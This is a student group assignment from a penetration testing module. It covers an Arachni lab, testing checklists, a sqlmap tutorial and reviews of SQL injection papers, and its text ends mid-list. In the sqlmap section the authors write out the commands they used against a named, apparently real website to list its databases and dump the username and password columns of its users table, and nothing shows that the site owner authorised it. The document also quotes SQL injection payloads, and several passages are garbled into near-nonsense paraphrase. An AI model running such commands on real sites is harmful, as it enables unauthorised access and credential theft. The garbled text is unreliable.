GROUP ASSIGNMENT

Name and TP Number:                    Jin Hao (TP035111) 

Lin Siong Jie (TP032265)
                                                            Sivanandha Muthamil Selvam(TP038986)

Intake code:                                       UC3F17102IT (ISS)

Module name: Penetration Testing

Module code:                                     CT086-3-3-PNT

Lecturer's Name:                             Dr. Maryam Shahpasand

                                                            
Hand in date: 16th June, 2017
Table of Contents
Task 1 – Group Part...................................................................................................................4

Task 2 – Individual...................................................................................................................11

Sivanandha TP038986.............................................................................................................11

2.1 Grey box penetration testing on web application using arachni.................................................11

Why Gray Box Testing..................................................................................................................11
How to Protect Against Web Application AttacSQL infusion................................................12

Lin Siong Jie TP032265...........................................................................................................15

2.2 White Box Testing.....................................................................................................................15

Jin Hao TP035111....................................................................................................................20

2.3 Black Box Testing..............................................................................................................20

Task 3 – Group Part.................................................................................................................24

3.1Introduction................................................................................................................................24
3.2 What way Websites Get Hacked................................................................................................25
3.2.1 Scenario..................................................................................................................................26
3.3 Impact of the selected technique/tool/framework on the security..........................................27
3.4 General functionality of sqlmap.................................................................................................28
3.5 Step by step tutorial on how to use SQLMAP tool in Kali Linux................................................29
3.6 Countermeasure the sqlmap attack...........................................................................................35
3.7 Conclusion.................................................................................................................................36
Task 4 – Individual Part...........................................................................................................37

Sivanandha – TP038986..........................................................................................................37

Title: STUDY ON SQL INJECTION ATTACKS: MODE, DETECTION AND

PREVENTION.........................................................................................................................37

Objective.........................................................................................................................................37
Finding outcomes............................................................................................................................38
Impact of research in sql injection...........................................................................................40

Methodology and Techniques.........................................................................................................40

Future works and Recommendation................................................................................................41

2
Lin Siong Jie TP032265...........................................................................................................42

Jin Hao TP035111....................................................................................................................45

References................................................................................................................................50

3
Task 1 – Group Part
1. Application

The applicant that is going to build in is called “Arachni”. Arachni is mostly designed
towards web application security; however, it can be used as application for general scraping
or testing as well. Arachni is a full-featured, modular, high-performance Ruby framework,
which is designed to help penetrate testers and administrators to evaluate the security of Web
applications. Arachni has a lot of advantages for building a test lab. It is “smart”, it learns
itself automatically by learning from the HTTP response received during the audit process.
Unlike other scanners, Arachni takes into account the dynamic nature of Web applications
and can detect changes caused in travelling by going through the path of web. Moreover,
Arachni is able to handles attacks or input vectors that are not detectable by non-humans.
Finally, Arachni produced good performance due to its asynchronous HTTP mode (courtesy
by Typhoeus). Therefore, there are some limitation that you will only be limited by the
responsiveness of the audit and the bandwidth that is available.

2. Architecture

Nowadays, penetration testing lab has lots of different kind of architecture due to the
customized for different companies’ needs. However,. They are all designed from a very
basic simple architecture, and it adds more or less complexity based on the testers skills. In
this section, it will explain from the basic lab set up and its architecture to one that is more
complex and often implemented in a medium sized organization.

In simple testing lab architecture, the minimum requirements to build a testing lab, is first of,
it needs 2 pc which is the minimum number of virtual machines in a testing lab. One is going
to simulate as attacker, and the other one is going to be used as a target machine. Moreover,
VMs are all installed with virtualization software such as windows Xp, mac, Linux and so on.
Once the requirement is fulfilled, we can start to diagram the lab set up or to add more
complexity.

4
In this simple testing lab, a small network is built in the target machine, which can be
presented as a small business entity. Besides that, there is a firewall between both target
machine and attacker, which will actually defend and protect against attacks that is going to
be launching in the penetration testing. For network infrastructure such as switches, cisco
viral is provided as well, which is the simulation software to emulate the network security.

1. Propose a general architecture of penetration testing lab

This complex testing lab architecture is added more based on a simple testing lab
architecture. It is designed as in real-world environments by using adding a layered security
approach. To increase the skill-level, the layers of security can be added to the testing lab. In
this diagram, there a DMZ tier that has Internet servers and an internal network where having
inside of VM’s and servers. The DMZ is designed to allow certain traffic from some of the
DMZ servers to internal servers. Besides that, domain policies are designed as well in order
to providing additional layers of security. Lastly, the cisco firewall are implemented as well,
and this firewall is configured to be most restrictive manner by require specific IP and port
number connectivity.

5
Types of Software that is needed to set up a penetration testing lab

Nowadays, setting up a penetration lab looks like easy tasks for penetration tester.
Penetration tester need to have the right tools and software to start a penetration testing lab.
There are many tools provided but some of the tools might not helpful for penetration tester.
In this assignment, we will be using useful tools to help us to start a penetration testing lab.

VMware

- VMware is a virtualization and cloud computing software provider based in Palo Alto,
California.

- Penetration tester will be using VMware WorkStation as the virtual lab for penetration
testing lab.

- It helps the penetration tester able to test the vulnerability on different operating system.

Kali Linux

- Kali Linux is an open source project that is maintained and funded by Offensive Security, a
world class information security training and penetration testing services.

- Kali Linux has some requirement to install the system.

• Minimum of 10GB hard disk space for installation

• Minimum of 512MD RAM for i386 and AMD64 architectures

• Bootable CD-DVD drive or a USB stick

- Kali Linux has many well-known security tools such as Nmap, Aircrack-ng, Wireshark,
John the Ripper and more.

- Penetration tester able to make full use of it to conduct a penetration testing with the useful
tools that Kali Linux provided.

6
Arachni

- Arachni is an open source, feature-full, modular, high-performance Ruby framework aimed

towards helping penetration testers and administrators evaluate the security of web
applications.

- Penetration tester will be using Arachni application for setting up a penetration testing lab.

Specific configuration and steps to build penetration testing lab

Step 1

Figure 1: - Shows the tcp listen and the port number from the machine that been activated.

Step 2

Figure 2: - Showing the login GUI Arachni V1.5.1

7
Step 3

Figure 3: - After the login done the main page will be loaded.

Step 4

Figure 4: -
Show the main page for Input of data for attack

8
Step 5

Figure 5: -
Showing the page after the data and url of specify page is type in the specific box

Step 6

Figure 6: - Showing the scan result of the specific webpage that been scanned to identify the
vulnerabilities in the Web Server

9
Step 8

Figure 8: - Shows the part of webpage that did have the loop hole in the server.

10
Task 2 – Individual

Sivanandha TP038986
2.1 Grey box penetration testing on web application using arachni
Grey box testing is the combination of both White box testing and Black testing box
technique. In white box testing, analyzers know about the inward structure of code where as
in Black testing box analyzers aren't aware of the inner structure of the program. [ CITATION
Gur08 \l 1033 ]

The penetration test for the gray box tester for the web-application using the arachni is one of
the best way to find any vulnerabilities in any website because it able to detect the error in
detail and it will show the pen-tester which part they must fix and, they able to re-patch the
vulnerabilities in the web-application.

Grey box testing is a method to test the application with having a constrained learning of the
inner workings of an application. To test the Internet Administrations application often the
Dim box testing is utilized. Gray box testing is performed by end-clients and furthermore by
analyzers and engineers.

Why Gray Box Testing

Gray Box Testing is performed for the following reason,

 It provides combined benefits of both black box testing and white box testing both
 It combines the input of developers as well as testers and improves overall product
quality
 It reduces the overhead of long process of testing functional and non-functional types
 It gives enough free time for developer to fix defects
 Testing is done from the user point of view rather than designer point of view

11
How to Protect Against Web Application AttacSQL infusion

SQL injection

SQL injection are the point at which an assailant uses a web shape field or URL parameter to
access or control your database. When you utilize standard Transact SQL it is anything but
difficult to accidentally embed rebel code into your inquiry that could be utilized to change
tables, get data and erase information. You can without much of a stretch keep this by
continually utilizing parameterized questions, most web dialects have this element and it is
anything but difficult to actualize.

Utilize SSL.

Utilize an encoded SSL convention to exchange clients' close to home data between the site
and your database, which will maintain a strategic distance from the data being perused in
travel without the correct specialist.

XSS

Cross-site scripting (XSS) assaults infuse noxious JavaScript into your pages, which at that
point keeps running in the programs of your clients, and can change page substance, or take
data to send back to the assailant. For instance, in the event that you indicate remarks on a
page without approval, at that point an aggressor may submit remarks containing script labels
and JavaScript, which could keep running in each other client's program and take their login
treat, enabling the assault to take control of the record of each client who saw the remark.
You have to guarantee that clients can't infuse dynamic JavaScript content into your pages.

Move down as often as possible.

If there should arise an occurrence of any hacks happening, keep everything moved down.
Move down nearby, go down off-site, go down everything various times each day. Each time
a client spares a record it ought to consequently move down in different areas.

12
Web Application Penetration Testing Checklist

Task White Box Grey Box Black Box

Information Gathering x x x

Authentication testing x x x

Fingerprint web application x x x

Crawel Website x

Directory traversal Attack x x

vulnerability scanning x x x

Performing HTTP response splitting x x x

attack
Brute force SSH, FTP, and other x
services login credentials
Perform session hijacking x x x

Performing MITM attack x x x

examine the web server logs. x x x

13
Explanation

1. Performing web application Authentication Testing, use “Social engineering techniques”

to collect the information about the Human Resources, contact details and other social
related information.
2. Gathering Information about the target, use who is database query tools to get the Details
such as Domain name, IP address, Administrative Details, autonomous system number,
DNS, etc.
3. Fingerprint web application to gather information such as server name, server type,
operating systems, applications running on the server etc., use fingerprint scanning tools
such as: Netcraft, HTTPrecon, and IDServe.
4. Crawel Website to gather Specific information from web pages, such as email addresses
5. Enumerate web server Directories to extract important information about web
functionalities, login forms, etc.
6. Perform Directory traversal Attack to access Restricted Directories and execute the
command from outside of the Web server root directories.
7. Performing vulnerability scanning to identify the weakness in the network use the
vulnerability scanning tools such as HPwebinspect, Nessus, and determine if the system
can be exploited.

14
Lin Siong Jie TP032265
2.2 White Box Testing

As an ethnical hacker, he/she has a full knowledge of understanding the whole infrastructure
of the network. The ethnical hacker need to make sure the web application is secure from
intruders. Here are some steps to stop intruders to hack the web application.

 Update latest patches for web application software

 Configure the software in as a fashion as possible
 Implement proper human-resource requirement for deploying and operating a secure
web application
 Installing safeguards at various of entry into the application
 Organizations should monitor log files

How to Protect Against Web Application Attack

Here is a list of some of the most common types of web applications, and a few tips on what
you can do to help keep the organization business secure from each of these threats.

4 of the most common web application web application threats include:

• Cross site scripting (XSS)

• SQL injection

• DDoS attacks

• Cookie poisoning

15
Cross-Site Scripting(XSS)

Cross-site scripting (XSS) is regarded as the most common type of computer security
vulnerability, with a huge number of web applications that are online today being vulnerable
to this type of malicious script. XSS allows attackers to inject client-side script into Web
pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to
bypass access controls, which could cause serious problem for users.

Prevention: Best solution is to install an intelligent Web Application Firewall (WAF). A web
application firewall (WAF) filters, monitors and blocks HTTP traffic to and from a web
application. A WAF is differentiated from a regular firewall in that a WAF is able to filter the
content of specific web applications while regular firewalls serve as a safety gate between
servers. By inspecting HTTP traffic, it can prevent attacks stemming from web application
security flaws such as SQL injection, cross-site scripting (XSS) and security
misconfigurations.

SQL Injection

SQL injections are one of the most serious type of attack on the internet. These attacks take
advantage of web application vulnerabilities to gain control of databases and all of the
information contained within them. Any web application which stores data will use one or
more databases to hold that information and recall it when necessary. This could be things
such as names, email address, postal address, telephone numbers, credit card details, bank
information and much more.

Prevention: The most important precautions are data sanitization and validation, which
should already be in place. Sanitization usually involves running any submitted data through
a function (such as MYSQL’s mysql_real_escape_string () function) to ensure that any
dangerous characters (like “ ’ ”) are not passed to a SQL query in data. Validation is slightly
different, in that it attempts to ensure that the data submitted is in the form that is expected.
At the most basic level this includes ensuring that email addresses contain an “@” sign, that

16
only digits are supplied when integer data is expected, and that the length of a piece of data
submitted is not longer than the maximum expected length.

DDoS Attack

DDoS stands for a denial-of-service or as it’s more commonly known, a distributed denial-of-
service(DDoS). This type of attack is an attempt to make a machine or network resource
unavailable to its intended users. It can make your website run unbearably slow, or worst-
case scenario, take it offline completely. Several large corporate and even government
websites have been hit by DDoS attacks in the past.

Prevention: Assure your scalability. Scaling the analytics infrastructure is also an important
consideration. Flow technology scales rather well, but at a massive cost: it compromises
granularity and time to mitigate. The multi-vector attack trend illustrates the importance of
validating performance. Running basic attack such as SYN flood puts a base stress level onto
the CPUs-simultaneously fight a more complex application-layer attack such as HTTP GET
flood attack could push a system over its limit.

Cookie poisoning

On the web, cookie poisoning is the modification of a cookie (personal information in a Web
user’s computer) by an attacker to gain unauthorized information about the user for purposes
such as identity theft. The attacker may use the information to open new accounts or to gain
access to the user’s existing accounts.

Prevention: Clearing stored cookies from your browser regularly will ensure that there is
nothing for anybody to hijack. Always avoid signing up for sites and or newsletters that you
don’t trust or won’t use again. Regular virus and malware scanning is also advised to help
you keep your browser free from any malicious scripts which could be hijacking your cookie
– MalwareBytes is the software I use to keep my PC clean free malware, I use the free
version and it’s always done a remarkable job.

17
 

Web Application Penetration Testing Checklist

Task White Box Grey Box Black Box

Information Gathering x x

Authentication testing x x

Fingerprint web application x x

Crawel Website x

Directory traversal Attack x

vulnerability scanning x x

Performing HTTP response splitting x x

attack
Brute force SSH, FTP, and other x
services login credentials
Perform session hijacking x x

Performing MITM attack x x

examine the web server logs. x x

18
Explanation

8. Performing web application Authentication Testing, use “Social engineering techniques”

to collect the information about the Human Resources, contact details and other social
related information.
9. Gathering Information about the target, use who is database query tools to get the Details
such as Domain name, IP address, Administrative Details, autonomous system number,
DNS, etc.
10. Fingerprint web application to gather information such as server name, server type,
operating systems, applications running on the server etc., use fingerprint scanning tools
such as: Netcraft, HTTPrecon, and IDServe.
11. Crawel Website to gather Specific information from web pages, such as email addresses
12. Enumerate web server Directories to extract important information about web
functionalities, login forms, etc.
13. Perform Directory traversal Attack to access Restricted Directories and execute the
command from outside of the Web server root directories.
14. Performing vulnerability scanning to identify the weakness in the network use the
vulnerability scanning tools such as HPwebinspect, Nessus, and determine if the system
can be exploited.
15. Perform cache poisoning attack to force the web server’s cache to flush its actual cache
content and send a specifically crafted request which will be stored in the cache.
16. Performing HTTP response splitting attack to pass malicious data to a vulnerable
application that includes the data in an HTTP response header.
17. Brute force SSH, FTP, and other services login credentials to gain unauthorized access.
18. Perform session hijacking to capture valid session cookies and ID’s, use tools such as
Burb suite, Firesheep, jhijack to automated session hijacking.
19. Performing MITM attack to access the sensitive information by intercepting the altering
the communications between the end users and web servers.
20. Use tools such as Webalizer, AWStats to examine the web server logs.

19
Jin Hao TP035111
2.3 Black Box Testing
Black box testing is a test purpose methodology. In web application black box testing, the
web application itself is treated as a whole, without analyzing the structure and internal logic.
Web application scanners would typically see whether the web application as a whole, which
could be manipulated to get access to the database.

How to Protect Against Web Application Attack

Nowadays, securing a company’s web applications is the aspect that most easily to be
ignored when securing the enterprise. According to (acunetix, 2017), hacking behavior is
increasing as many as 75% of cyber-attacks done through the web and via web applications.
Most corporations have secured their data at the network level, but have overlooked the
crucial step of checking whether their web applications are vulnerable to attack. The
following are some methods s to avoid and stop intruders to hack the web application.
1. Stay updated.
Be stay update with the hacking threats by following the update tech news, and keep the
software updated as well.
2. Toughen up access control.
The admin level of the website is very important. It could be very easy to access. Therefore,
enforce user names and passwords that is hard to be guessed. Change the default database
prefix into something random and harder to guess.
3. Increase staff security awareness
Computer users in the office might provide an easy access to website servers. Therefore,
implement proper human-resource requirement for deploying and operating a secure web
application, and training with some basic knowledge to increase the staffs’ security
awareness
4. Increase security levels
Making sure the Logins expire after a short period of inactivity. And passwords are strong
enough and can be changed frequently. All devices plugged into the network are scanned for
malware each time they are attached.
5. Install a web application firewall.

20
A web application firewall (WAF) can be software or hardware based, which sets between
website server and the data connection and reads every bit of data passing through it.

6. Install security applications.

While not as effective as a full blown WAF, there are some free and paid for security
applications that are available. Such as Netsparker (Free community edition and trial version
available), which is good for testing SQL injection and XSS. OpenVAS. Claims to be the
most advanced open source security scanner. It is good for testing known vulnerabilities,
currently scans over 25,000. SecurityHeaders.io (free online check). It is a tool to quickly
report which security headers mentioned above (such as CSP and HSTS) a domain has
enabled and correctly configured. Xenotix XSS Exploit Framework A tool from OWASP
(Open Web Application Security Project) that includes a huge selection of XSS attack
examples, which you can run to quickly confirm whether your site's inputs are vulnerable in
Chrome, Firefox and IE.
7. SQL injection
SQL injection attacks are when an attacker uses a web form field or URL parameter to gain
access to or manipulate your database. When you use standard Transact SQL it is easy to
unknowingly insert rogue code into your query that could be used to change tables, get
information and delete data. You can easily prevent this by always using parameterized
queries, most web languages have this feature and it is easy to implement.
9. Use SSL.
Use an encrypted SSL protocol to transfer users’ personal information between the website
and your database, which will avoid the information being read in transit without the proper
authority.
10. XSS
Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then
runs in the browsers of your users, and can change page content, or steal information to send
back to the attacker. For example, if you show comments on a page without validation, then
an attacker might submit comments containing script tags and JavaScript, which could run in
every other user's browser and steal their login cookie, allowing the attack to take control of
the account of every user who viewed the comment. You need to ensure that users cannot
inject active JavaScript content into your pages.
11. Back-up frequently.
In case of any hacks happening, keep everything backed-up. Back up on-site, back up off-
site, back up everything multiple times a day. Every time a user saves a file it should
automatically back up in multiple locations.

21
Web Application Penetration Testing Checklist
Task White Box Grey Box Black Box

Information Gathering x x

Authentication testing x x

Fingerprint web application x x

Crawel Website x

Directory traversal Attack x

vulnerability scanning x x

Performing HTTP response splitting x x

attack

Brute force SSH, FTP, and other x

services login credentials

Perform session hijacking x x

Performing MITM attack x x

examine the web server logs. x x

22
Explanations: Why Black box

1. Black box testing is a very efficient testing, which is well suited and efficient for large
code segments or units.
2. Black box is unbiased testing, it is clearly separates user's perspective from
developer's perspective through separation of QA and Development responsibilities.
3. Black box testing is ton-intrusive testing, which means that code access not required.
4. It is very easy to execute, and the tester can be non-technical. It can be scaled to large
number of moderately skilled testers with no knowledge of implementation,
programming language, operating systems or networks.
5. Used to verify contradictions in actual system and the specifications.
6. Test cases can be designed immediately after the completion of specifications
7. Black box tests are reproducible.
8. The environment the program is running is also tested.
9. The invested effort can be used multiple times.
10. More effective on larger units of code than glass box testing
11. Tester needs no knowledge of implementation, including specific programming
languages
12. Tests are done from a user's point of view
13. Will help to expose any ambiguities or inconsistencies in the specifications
14. Efficient when used on Larger systems
15. As the tester and developer are independent of each other, test is balanced and
unprejudiced
16. There is no need of having detailed functional knowledge of system to the tester.

23
17. Tests will be done from an end user's point of view. Because end user should accept
the system. (This is reason, sometimes this testing technique is also called as
Acceptance testing)
18. Testing helps to identify the vagueness and contradiction in functional specifications.
19. Test cases can be designed as soon as the functional specifications are complete

24
Task 3 – Group Part
3.1Introduction
According to [ CITATION TON15 \l 17417 ] in 2014 there are 1 billion website reached in the
internet. Today it’s hovering somewhere in the neighbourhood of 944 million due to websites
going inactive, and it is expected to normalize again at 1 billion sometime in 2015. Another
shocking measurement is that Google, a standout amongst the most well-known web crawlers
on the planet, isolates roughly 10,000 sites a day by means of its Safe Browsing innovation.
From our own particular examination, out of a large number of sites that push through our
checking innovation, around 2 – 5% of the them have some Indicator of Compromise (IoC)
that connotes a site assault. Without a doubt, this may be somewhat high, as the sites being
checked are frequently associated with having an issue, so to be moderate we would
extrapolate that to propose around 1% of the aggregate sites online are hacked or
contaminated. To place that into point of view, we are talking something like 9 million sites
that are as of now hacked or tainted.

With this kind of effect, it's lone characteristic that individuals are interested how sites
continue getting hacked. The test is that the answer has been the same for a long while.

In the previous month I started a progression of articles on different parts of site hacks and
diseases: Websites get Hacked, and the different inspirations driving them, alongside The
Impacts of a Hacked Website, where we took a gander at what the ramifications of a hack
were to site proprietors of all gauges. Today, we'll pause for a minute to comprehend the
How.

It is the one question that practically every site security proficient gets eventually in their
profession, and at times, over and over. As geniuses, we underestimate the learning we have
increased throughout the years and overlook what it resembles not to know.

Sites get hacked in view of three things:

 Access Control
 Programming Vulnerabilities
 Outsider Integrations

25
3.2 What way Websites Get Hacked

According to [ CITATION TON15 \l 17417 ] what I find interesting about site hacks is that
they generally come down to the same components paying little mind to the
association's size. It doesn't make a difference on the off chance that you are a fortune
500 or a little business selling cupcakes. The main distinction is the why.

In vast associations it is regularly on the grounds that they failed. They knew
precisely what the risk was, however they never thought it would reach out to their
sites, with the normal reaction being – "I thought another person was taking care of
it". With regards to little organizations, it is frequently – "Why might anybody need to
hack me? I never knew it'd be an issue for me, I'm not Target, I don't have charge card
data". Around 95 percent website still can’t address recognise the attack that happen
to their website. These product vulnerabilities reach out past the site itself and
effectively seep into the different advances we examined above (i.e., web server, base,
and so on.). Anyplace there is a framework, there's a potential programming
helplessness holding up to be abused. This can likewise reach out to your program
(i.e., Chrome, Internet Explorer, Firefox, and so forth.).

26
3.2.1 Scenario
Kali Linux is a legal and mostly open-source security suite designed by security experts in
the computer and software Industry. Its creation is intended as both an educational tool and as
a toolbox for network administrators who wish to secure a private or corporate network, or
used in testing a ‘secured’ network.

Assume that a EHIR student and and the lecturer giving you the task to hack a website using
the sqlmap. What you need is to find a website which is vulnerable to SQL Injection, but
does not show error messages. Basically, a site which can be hacked into but not using
classical attacks. The site will not give any obvious responses to our attacks. This is why it is
called a blind SQL Injection. It is hard to know whether we're doing it right or not.

Now there's a problem. Blind SQLi is quite time consuming. One first tried the classical
attacks, and if they fail, then only they proceed too blind SQLi. I can't find a website which
wouldn't mind being attacked, and exposed in public. So I'll have to use the same old
testphp.vulnweb.com website. The URL we're going to attack is vulnerable too classical
SQLi. However, we're going to assume that it's not, and attack it without using any of the
methods we used in the previous SQLi tutorial. That being said, blind SQLi involves a lot of
guessing, and the fact that I can use union based sql injection (classical injection that we did
already) to find out table names, etc. makes it much easier for me to write the tutorial.

Now the first take is to find out whether the target is vulnerable or not. Ideally, one would
add an asterisk to find whether the target is vulnerable to classical injection. If not, then only
should he/she proceed too blind SQLi. In our case, the target is indeed vulnerable to classical
injection (since we see an error when we append an asterisk ' to the url). But for the sake of
learning, we will ignore this fact and proceed with Blind SQLi. We will from now assume
that there will be no errors whatsoever to aid our attack.

3.3 Impact of the selected technique/tool/framework on the security

Financial Losses
27
According to the website[ CITATION Sar16 \l 17417 ] Every year, reports of hacked businesses
reveal staggering financial losses as a result. In 2011, Sony lost $170 million due to a hack of
their PlayStation system. Also in 2011, CitiGroup lost $2.7 million and AT&T lost $2 million
as a result of hackers. The cost of patching the holes in security, repaying customer losses,
addressing lawsuits and weathering shutdowns of their systems contributed to those huge
numbers. Even for an individual who loses his credit card information to a hacker, however,
the cost of repairing damage and tracking down the culprit can be significant.

Loss of Information

Hacking often results in a loss of data due to files being deleted or changed. Customer
information and order information can be stolen and deleted, or a leak of top secret
information could cause real-world security issues. Servers at the Pentagon, FBI, Interpol and
NASA have all been compromised at various points in the past ten years. Sometimes, these
hackers even post information from these governmental organizations online, which could in
theory cause unrest between countries.[ CITATION Sar16 \l 17417 ]

Decreased Privacy

When hackers gain access to your computer, they can see everything. Since much of the
personal, professional and financial parts of our lives have moved online, we risk losing
much more than money or information. Because of the Internet, privacy is limited, usually by
choice. A hacker with access to your email, social networking accounts and personal photos
can very quickly destroy that privacy.[ CITATION Sar16 \l 17417 ]

Damaged Reputation

Companies that get hacked have a bigger problem than just paying for the initial damage
costs and lawsuits. Reputation damage can be devastating to a company's fortunes. If a bank
has been compromised multiple times, customers are less likely to give them their personal
information. The same goes for retailers who lose information to hackers. These companies
lose business over time because of damaged or weakened reputations. Individuals with stolen
identities as a result of hacking have a similar reputation problem when it comes to their
credit ratings.[ CITATION Sar16 \l 17417 ]

3.4 General functionality of sqlmap

According to this website[ CITATION Ber16 \l 17417 ] sqlmap is an open source entrance testing
apparatus that robotizes the way toward identifying and misusing SQL infusion blemishes

28
and assuming control of database servers. It accompanies an effective discovery motor,
numerous corner highlights for a definitive entrance analyser and a wide scope of changes
enduring from database fingerprinting, over information bringing from the database, to
getting to the hidden record framework and executing charges on the working framework by
means of out-of-band associations.

 Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft
Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database
management systems.
 Full support for six SQL injection techniques: Boolean-based blind, time-based blind,
error-based, UNION query-based, stacked queries and out-of-band.
 Support to directly connect to the database without passing via a SQL injection, by
providing DBMS credentials, IP address, port and database name.
 Support to enumerate users, password hashes, privileges, roles, databases, tables and
columns.
 Automatic recognition of password hash formats and support for cracking them using
a dictionary-based attack.
 Support to dump database tables entirely, a range of entries or specific columns as per
user's choice. The user can also choose to dump only a range of characters from each
column's entry.
 Support to search for specific database names, specific tables across all databases or
specific columns across all databases' tables. This is useful, for instance, to identify
tables containing custom application credentials where relevant columns' names
contain string like name and pass.
 Support to download and upload any file from the database server underlying file
system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

3.5 Step by step tutorial on how to use SQLMAP tool in Kali Linux

29
Step 1: - First you have to search the website that can make the hack remember always to use
the key word to find the correct website. (The keyword is php?=1)

Step 2: - Open the Kali Linux and open the command pad/sqlmap

30
Step3: - Make a database search

Step4: - And you will get the type of database.

Step5: -Select one of the database and attack the database.

31
Step6: - Now attack of database is scanning.

Step7: - Now it will show the selected database

32
Step 8: - type the code for run the attack on users

Step9:- Then it will show the type data that contain on the users

Step 10:- And try to attack the username and password database.

33
And lastly you will able to retrieve the password and the username of the selected website
enjoy your hacking the website thank you.

With this I will attached the code that I used for the hacking

Step1:

sqlmap -u http://www.newdeal.so/content.php?id=1 --dbs

Step2

sqlmap -u qlmap -u http://www.newdeal.so/content.php?id=1 --dbs -D

Step3

sqlmap -u http://www.newdeal.so/content.php?id=1 -D newdeal_newdb --tables

Step4

sqlmap -u http://www.newdeal.so/content.php?id=1/ -D newdeal_newdb -T users --columns

Step5

sqlmap -u http://www.newdeal.so/content.php?id=1/ -D newdeal_newdb -T users -C

username –dump

Step6

34
sqlmap -u http://www.newdeal.so/content.php?id=1/ -D newdeal_newdb -T users -C
password --dump

3.6 Countermeasure the sqlmap attack

With such tools in circulation, and Web application vulnerabilities at large, what can
businesses do to better safeguard themselves? When it comes to stopping SQL injection
attacks, start with these pieces of advice:

1. Blacklist malicious hosts.  All of this means that the most dangerous hosts can be
identified, and then blacklisted against database access.
2. Pool resources. Businesses that share on SQL injection attacks could have a better picture
of which hosts were launching such attacks. Update rate of the blacklist must be high in order
to keep up with new threats," because on average hosts only remain active for half a day.
3. Minimize access. Restrict the data that any given Web application can retrieve from a
database. Never allow admin-level access to a database from a Web application.
4. Encrypt data. Never store data in plain text format. Rather, encrypt data, and so that if
attackers do manage to dump your database, they'll extract fewer pieces of high-value
information.

35
5. Distrust users. That's one essential Web application security mantra, according. What it
means is that in an ideal scenario, Web application developers would only allow the inputs
that they expect to receive, and would block all others.
6. Profile applications. Understand normal Web application behaviour, so you can quickly
identify when the application is behaving abnormally, such as attempting to execute many
more database lookups than normal, or using unusual inputs.
7. Normalize inputs. Normalize database inputs--"to avoid evasion attempts," then compare
them against a database of known-bad inputs, to spot in-progress attacks.
8. Watch for automation. Since most SQL injection attacks are launched using automated
tools, watch for indications of this technique. Various mechanisms exist to detect usage of
automatic clients, like rate-based policies and enforcement of valid client response to
challenges.

The above techniques will help IT teams block SQL injection attacks. They won't stop every
last Web application attack, but given the prevalence of vulnerabilities in those applications,
as well as attackers' ability to successfully exploit the flaws, businesses can use all of the help
that they can get.

3.7 Conclusion

It is clear from above portrayal that SQL infusion assaults are one of the biggest classes of
security issues. Most existing procedure either oblige designers to physically indicate the
interfaces to an application or, on the other hand, if computerized, are regularly lacking when
connected to present day, complex web applications.

36
Task 4 – Individual Part

Sivanandha – TP038986
Journal Information

Title: STUDY ON SQL INJECTION ATTACKS: MODE, DETECTION AND

PREVENTION
Author: Subhranil Som, Sapna Sinha, Ritu Kataria

Journal Name: International Journal of Engineering Applied Sciences and Technology

Date: June - July 2016

Location: AIIT, Amity University Uttar Pradesh, Noida, India

Objective
Web applications are by and by used for online organizations, for instance: long range casual
correspondence, shopping and overseeing records thus forward. Web applications manages
complex client data. Unapproved get to can prompt crumple of a framework; even can disturb
the presence of an organization or a bank or a branch. SQL Injection Attacks (SQLIA) is a
champion among the most unsafe security risks to Web applications. Specialists are
attempting to control SQLIA at the application layer, however already they are attempting to
forestall SQLIA at the database level through put away methodology. This paper indicates
approaches to avoid SQLIA in put away methodology. The application is secured from
assaults with the innovation on two stages because if to begin with stage can't secure at that
point second stage can avert assault.

A Critical Review proposes that by utilizing SQLIA, an aggressor can get these lines pick up
or alter private/delicate data. There are next to no accentuation is laid on securing set away
methodology in the database layer which could encounter the terrible effects of SQLIA. As
set away strategies live on the database front, the strategies proposed by them can't be related
with secure set away systems themselves. They proposed a novel technique to get ready for
the ambushes focused at set away reasoning. This framework joins static application code
examination with runtime affirmation to take out the event of such attacks. In the static part,
they lay out a set away technique parser, and for any SQL declare which relies on upon client
inputs, they utilize this parser to instrument the imperative illuminations with a specific
completed goal to separate the essential SQL verbalization structure with that including client

37
inputs. The strategy of this technique can be mechanized and utilized on a need-essentially
present. This paper gives logical order of techniques to turn away and perceive SQLIA. they
portray web application vulnerabilities and how they may realize SQLIA. By then, we
demonstrate a request of SQLIA in perspective of shortcoming. A while later, the SQL
infusion seclusion and three one of a kind classes for balancing activity techniques. These
systems in the time that adjust to SQLIA believability. Different SQL acknowledgment and
repugnance techniques are being discussed in this paper which starting late been proposed by
a given assailant. Also, the frameworks were surveyed, with respect to sending essentials.

Finding outcomes
Progressed SQL Injection in SQL Server Applications This report talks about in detail the
basic 'SQL infusion' procedure, as it applies to the mainstream Microsoft Internet Information
Server/Active Server Pages/SQL Server stage. It examines the different routes in which SQL
can be "infused" into the application and addresses a portion of the information approval and
the detachment issues of database related to these assaults. SQL Injection Attacks in Web
Application This paper displays the distinctive different systems of SQLIA. By using these
strategies, the product architects and system chiefs can appreciate the SQLIA more inside and
out and secure the web application from SQLIA. However, as the development continues
developing, so will the security threats and frameworks used by noxious customers. As the
customers of the web move their fragile data into the online condition, it is fundamental that
security be given the most striking in the change of web applications. SQL Injection Attacks:
Techniques and Protection Mechanisms Code infusion assault, especially SQLIA is one of
the shocking issues. Controlling the noxious SQL code/script on the web application and
keeping up the end security is yet a key test for the web design. Website specialists
incorporated into making locales ought to consider these issues using databases. This paper
delineates how an aggressor can manhandle the web application by using SQL infusion
assault to get private information from a database. Differing confirmation frameworks against
SQLIA are similarly proposed.

38
TYPES OF SQL Injection Attack

1. Tautologies: - Inject SQL tokens to the conditional query statement which are
constantly assessed to be genuine.

 SAMPLE CODE: SELECT * FROM Customer WHERE name = ‘ritu’ OR ‘1’

= ‘1

2. Logically Incorrect Queries: - These incorrect texts help attackers to find parameters
in the application and in this manner the application's database.

3. Union Query: - By this system, the assailant gives the mistaken information the few
right fields, the SQL question is sent with the "Union" of both right and erroneous
fields. As the outcome, the dataset from the database is gotten with the right fields.

 Sample code :- An attacker could inject the text “’ UNION SELECT card_No from
Credit_Cards where acct_No=12450 --” into the login field, which produces the
following query: SELECT acc_inf FROM clients WHERE login=’’ UNION SELECT
card_No FROM Credit_Cards WHERE acct_No=12450 -- AND pass=’’ AND pin=

4. Piggy-backed Queries:- In this sort of attack, with the existing query an attacker adds
on extra queries and with this type of queries the attacker doesn’t changes the original
query rather puts on a new query with the old one resulting into multiple SQL queries
received by the database.

